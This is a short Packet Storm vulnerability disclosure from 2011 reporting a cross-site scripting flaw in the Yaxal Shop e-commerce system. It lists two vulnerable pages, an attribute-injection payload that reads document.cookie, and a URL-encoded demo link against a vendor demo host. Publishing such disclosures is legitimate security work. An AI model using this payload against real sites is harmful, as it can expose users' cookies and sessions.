Yaxal Shop Cross Site Scripting

2011-08-22T00:00:00
ID PACKETSTORM:104311
Type packetstorm
Reporter Eyup CELIK
Modified 2011-08-22T00:00:00

Description

                                        
                                            `# Exploit Title: Yaxal Shop (E-Commerce System) Stored XSS  
# Date: 2011  
# Author: Eyup CELIK  
# Software Link: http://www.polyspaston.com/content_shopdirector.php  
# Version: All Version  
# Tested on: All versions are Vulnerability  
  
ISSUE  
  
Cross Site Scripting can be done using the command input  
  
Vulnerable Page:  
yaxal_products.php  
yaxal_user.php  
  
Example:  
yaxal_user.php/<XSS Code>  
yaxal_products.php/<XSS Code>  
  
Exploit:  
"onmouseover=prompt(document.cookie)>  
  
Demo:  
http://demo.yaxal.com/yaxal_products.php/%22onmouseover=prompt%28905645%29%3E  
  
  
Thanks,  
  
  
Eyup CELIK  
Bilgi Teknolojileri Güvenlik Uzmani  
http://www.eyupcelik.com.tr  
`